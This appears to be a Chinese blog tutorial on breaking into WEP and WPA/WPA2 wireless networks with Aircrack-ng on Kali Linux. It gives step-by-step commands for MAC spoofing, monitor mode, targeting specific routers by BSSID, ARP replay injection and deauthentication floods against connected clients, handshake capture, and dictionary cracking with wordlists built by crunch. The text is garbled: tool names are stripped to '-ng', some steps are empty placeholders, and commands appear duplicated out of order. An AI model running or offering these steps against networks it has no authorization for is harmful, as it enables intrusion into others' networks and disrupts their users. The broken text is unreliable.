曹操： 使用Aircrack-ng工具破解WEP、WPA/WPA2加密的无线网络

特别声明：本文是参照“9.2 使用-ng工具破解无线网络”进行实验的。链接为：链接地址。因为这个链接我经常打不开，所以特地实验并记录一遍以方便以后查阅。-ng是一款基于破解无线802.11协议的WEP及WPA-PSK加密的工具。本文采用-ng（Kali系统自带-ng工具）实验破解WEP、WPA/WPA2加密方式的无线网络，其中破解WEP加密方式的无线网络能够100%破解，而且破解速度比较快；破解WPA/WPA2加密的无线网络，存在着个别网络获取不到握手包的情况，即便获取到握手包也需要依赖强大的密码字典才能破解，若是密码字典里不包含要破解的密码也破解不了。

实验环境： 操作系统：连着网线的笔记本，笔记本在中安装Kali系统，Kali版本kali-Linux-2017.1-i386.iso Kali系统下载链接：下载链接 无线网卡：wg111 v3 网卡（kali下免驱）

破解WEP加密的无线网络： WEP（有线等效加密）协议是对在两台设备间无线传输的数据进行加密的方式，用以防止非法用户窃听或侵入无线网络。这种加密方式非常容易破解，不过现在还是有不少使用这种加密方式无线网络。

下边介绍下破解步骤： 1.使用-ng命令查看当前系统中的无线网络接口

shell ng

这样就可以查看到当前系统中的无线网络接口。

ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0

输出的信息表示，当前系统中存在一个无线网络接口。从输出结果的列，可以看到当前系统的无线接口为wlan0。

2.修改wlan0接口的MAC地址。因为MAC地址标识主机所在的网络，修改主机的MAC地址可以隐藏真实的MAC地址。在修改MAC地址之前，需要停止该接口。命令如下：

shell sudo ifconfig wlan0 down

这个命令将会停止wlan0接口。

接下来，我们可以使用以下命令来修改MAC地址：

shell sudo macchanger -r wlan0

这个命令将会随机生成一个新的MAC地址，并将其应用到wlan0接口上。

完成MAC地址修改后，我们可以使用以下命令来启动wlan0接口：

shell sudo ifconfig wlan0 up

这样，wlan0接口的MAC地址就被成功修改了。

airmon-ng start wlan0

airodump-ng wlan0mon

输出的信息显示了wlan0接口永久的MAC地址、当前的MAC地址及新的MAC地址。可以看到wlan0接口的MAC地址已经被成功修改。

3.重新启动wlan0。输出的信息显示了无线网卡wlan0的芯片及驱动类型，并显示监听模式被启用，映射网络接口为。

shell sudo airmon-ng start wlan0

这个命令将会重新启动wlan0接口，并启用监听模式。

4.使用命令定位附近所有可用的无线网络。

shell sudo airodump-ng wlan0mon

这个命令将会扫描附近的无线网络，并显示它们的详细信息，如SSID、信号强度、加密方式等。你可以根据需要进行进一步的操作，比如破解加密的无线网络。

airodump-ng --ivs -c 4 --bssid E0:05:C5:A7:0F:60 -w wifi8103 wlan0mon

以上输出的信息显示了附近所有可用的无线网络。当找到用户想要攻击的无线路由器时，按下Ctrl+C键停止搜索。

从输出的信息中可以看到很多参数，下面是对这些参数的详细介绍：

• BSSID：无线路由器的MAC地址。
• PWR：信号强度，数值越大表示信号越强。
• Beacons：发送的信标帧数量，用于广播网络的存在。
• Data：发送的数据帧数量。
• CH：信道号，表示无线网络所在的频段。
• MB：最大传输速率。
• ENC：加密方式，表示无线网络的加密类型。
• CIPHER：加密算法，用于加密数据的算法。
• AUTH：认证方式，表示无线网络的身份验证方式。
• ESSID：无线网络的名称。

5.使用-ng捕获指定BSSID的文件。

shell sudo airodump-ng -c [信道号] --bssid [目标BSSID] -w [文件名] wlan0mon

这个命令将会使用-ng工具来捕获指定BSSID的文件。你需要替换[信道号]为目标无线网络所在的信道号，[目标BSSID]为目标无线网络的MAC地址，[文件名]为保存捕获数据的文件名。执行该命令后，工具将会开始捕获目标无线网络的数据包，并将其保存到指定的文件中。

aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]
aireplay-ng -dauth 1 -a [BSSID] -c [our Chosen MAC address] [Interface]

aireplay-ng -1 0 -a E0:05:C5:A7:0F:60 -h 00:11:22:33:44:55 -e TP-LINK_8103 wlan0mon

aireplay-ng -3 -b E0:05:C5:A7:0F:60 -h 00:11:22:33:44:55 wlan0mon

-ng命令常用的选项如下所示：

• -c [信道号]：设置无线网络所在的信道号。
• --bssid [目标BSSID]：指定目标无线网络的MAC地址。
• -w [文件名]：设置保存捕获数据的文件名。
• wlan0mon：指定无线网络接口。

6.打开一个新的终端窗口，运行命令。命令的语法格式如下所示：

shell 命令

在终端窗口执行。

7.使用发送一些流量给无线路由器，以至于能够捕获到数据。输出的信息就是使用ARP的方式来读取ARP请求报文的过程。若连接着该无线路由器/AP的无线客户端正在进行大流量的交互，比如使用迅雷、电骡进行大文件下载等，则可以依靠单纯的抓包就可以破解出WEP密码。但是无线黑客们觉得这样的等待有时候过于漫长，于是就采用了一种称之为“ARP”的方式来读取ARP请求报文，并伪造报文再次重发出去，以便刺激AP产生更多的数据包，从而加快破解过程，这种方法就称之为注入攻击。

回到-ng界面。

aircrack-ng wifi8103-01.ivs

可以看到YP-的栏的数字在飞速递增。在抓取的无线数据报文达到了一定数量后，一般是指IVsX值达到2万以上时，就可以开始破解。若不能成功，可以等待数据包继续抓取，然后多尝试几次。

8.使用破解密码。执行此步骤时，上一步的-ng窗口不用关闭，可以新开一个终端窗口运行。

shell 命令

在新的终端窗口中执行破解密码的命令。具体的命令会根据破解方式和工具的不同而有所不同。根据你的需求选择合适的破解方法，并按照相应的语法格式执行命令。

从输出的结果中可以看到“KEY FOUND！”，后边括号里的为密码。

破解WPA/WPA2无线网络： WPA全名为Wi-Fi Protected Access，有WPA和WPA2两个标准。它是一种保护无线电脑网络安全的协议。对于启用WPA/WPA2加密的无线网络，其攻击和破解步骤及攻击是完全一样的。不同的是，在使用-ng进行无线探测的界面上，会提示为WPA CCMP PSK。当使用-ng进行攻击后，同样获取到WPA握手数据包及提示；在破解时需要提供一个密码字典。下面将介绍破解WPA/WPA2无线网络的方法。

前3步跟破解WEP密码步骤是一样的。

1.使用-ng命令查看当前系统中的无线网络接口。

shell ng

这个命令将会显示当前系统中的无线网络接口。

ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0

airmon-ng start wlan0

airodump-ng wlan0mon

airodump-ng -c 1 --bssid F4:EC:38:0D:6A:B8 -w wifi123 wlan0mon

aireplay-ng --deauth 1 -a F4:EC:38:0D:6A:B8 -c 18:59:36:1B:C5:03 wlan0mon

2.修改wlan0接口的MAC地址。 shell sudo ifconfig wlan0 down sudo macchanger -r wlan0 sudo ifconfig wlan0 up

3.重新启动wlan0。 shell sudo airmon-ng start wlan0

4.使用命令定位附近所有可用的无线网络。 shell sudo airodump-ng wlan0mon

在输出的结果中找到目标无线网络，这里是WPA2加密的TP-。

5.捕获数据包。 shell sudo airodump-ng -c [信道号] --bssid [目标BSSID] -w [文件名] wlan0mon

如果已经获取到WPA握手包，可以跳过步骤6。否则，继续执行步骤6。

6.对无线路由器进行攻击。 shell sudo aireplay-ng -0 0 -a [目标BSSID] -c [客户端MAC地址] wlan0mon

这个命令将会发送一种称之为“deauthentication”的数据包来将已经连接至无线路由器的合法无线客户端强制断开，从而让客户端重新连接无线路由器。这样，你就有机会捕获到包含WPA-PSK握手验证的完整数据包了。

aircrack-ng -w wordlist.txt wifiDED5A2-01.cap

若是执行完这一步还没出现握手包，可以适当增加后边的攻击次数，比如增加到10。

7.将抓到的包跑密码字典（我用的密码字典为.txt）。

shell sudo aircrack-ng -w [密码字典文件] -b [目标BSSID] [捕获的数据包文件]

这个命令将会使用指定的密码字典文件对捕获的数据包进行破解。你需要将[密码字典文件]替换为你使用的密码字典文件名，[目标BSSID]替换为目标无线网络的MAC地址，[捕获的数据包文件]替换为之前捕获的数据包文件名。

从输出的结果中可以看到“KEY FOUND！”，后边括号里的为密码。

创建密码字典： 密码字典可以从网上下载，也可以自己创建。crunch是一种创建密码字典的工具，可以用于暴力破解。使用该工具可以生成密码，并将其发送到终端、文件或其他程序。

使用生成字典的步骤为：

1.启动命令。

shell crunch [最小长度] [最大长度] [字符集] -o [输出文件名]

这个命令将会生成一个密码字典文件。你需要将[最小长度]替换为密码的最小长度，[最大长度]替换为密码的最大长度，[字符集]替换为包含在密码中的字符集，[输出文件名]替换为生成的密码字典文件名。

crunch [minimum length] [maximum length] [character set] [options]

2.使用命令生成密码的语法格式如下所示：

shell 命令 [最小长度] [最大长度] [字符集] -o [输出文件名]

命令常用的选项如下所示：

• [最小长度]：密码的最小长度。
• [最大长度]：密码的最大长度。
• [字符集]：包含在密码中的字符集。
• -o [输出文件名]：指定生成的密码列表的输出文件名。

采用上述命令将生成密码列表的最小长度为8，最大长度为10，并使用一个字符集的密码列表文件。

参考资料： 文章来源：链接地址